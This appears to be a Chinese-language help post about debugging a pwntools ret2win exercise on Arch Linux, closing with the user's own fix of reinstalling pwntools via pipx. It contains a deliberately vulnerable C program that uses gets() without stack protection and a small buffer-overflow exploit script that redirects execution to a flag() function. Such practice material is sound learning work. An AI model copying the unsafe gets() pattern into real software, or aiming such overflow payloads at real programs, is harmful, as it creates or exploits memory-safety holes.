操作系统:Arch Linux x86_64
这是我的源代码:
// gcc source.c -o vuln -no-pie -fno-stack-protector -z execstack -m32
#include <stdio.h>
void unsafe() {
char buffer[40];
puts("Overflow me");
gets(buffer);
}
void main() {
unsafe();
}
void flag() {
puts("Exploited!!!!!");
}
这是我的漏洞利用脚本:
from pwn import *
context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['alacritty', '-e']
p = process('./vuln')
gdb.attach(p, 'b *0x080491aa')
payload = b'A' * 52
payload += p32(0x080491c3)
pause()
p.sendline(payload)
p.interactive()
这是我在pwndbg界面中使用的命令:
pwndbg> r
Starting program: /home/cub3y0nd/Downloads/ret2win/vuln
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".
Overflow me
使用
rλ ~ python exp.py
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
b *0x080491aa
[+] Starting local process './vuln' argv=[b'./vuln'] : pid 175664
[DEBUG] Wrote gdb script to '/tmp/pwn457bb8b6.gdb'
b *0x080491aa
[*] running in new terminal: ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb']
[DEBUG] Created script for new terminal:
#!/usr/bin/python
import os
os.execve('/usr/bin/gdb', ['/usr/bin/gdb', '-q', './vuln', '175664', '-x', '/tmp/pwn457bb8b6.gdb'], os.environ)
[DEBUG] Launching a new terminal: ['/usr/bin/alacritty', '-e', '/tmp/tmpikuhhld1']
[+] Waiting for debugger: Done
[*] Paused (press any to continue)
[DEBUG] Sent 0x39 bytes:
00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│
*
00000030 41 41 41 41 c3 91 04 08 0a │AAAA│····│·│
00000039
[*] Process './vuln' stopped with exit code -9 (SIGKILL) (pid 175664)
Traceback (most recent call last):
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 702, in send_raw
self.proc.stdin.flush()
BrokenPipeError: [Errno 32] Broken pipe
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/cub3y0nd/Downloads/ret2win/exp.py", line 16, in <module>
p.sendline(payload)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 816, in sendline
self.send(line + self.newline)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/tube.py", line 795, in send
self.send_raw(data)
File "/usr/lib/python3.11/site-packages/pwnlib/tubes/process.py", line 704, in send_raw
raise EOFError
EOFError
我在其他电脑上尝试了同样的操作,但正常,pwndbg 没有崩溃。
我不知道问题出在哪里,我尝试重新安装pwndbg和pwntools,但没有解决问题。
每次我打开 pwndbg 时,我都会收到此警告:
/usr/share/pwndbg/gdbinit.py:10: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html import pkg_resources请告诉我如何解决这个 pwndbg hook 调试问题。
我使用pipx重新安装pwntools解决了这个问题。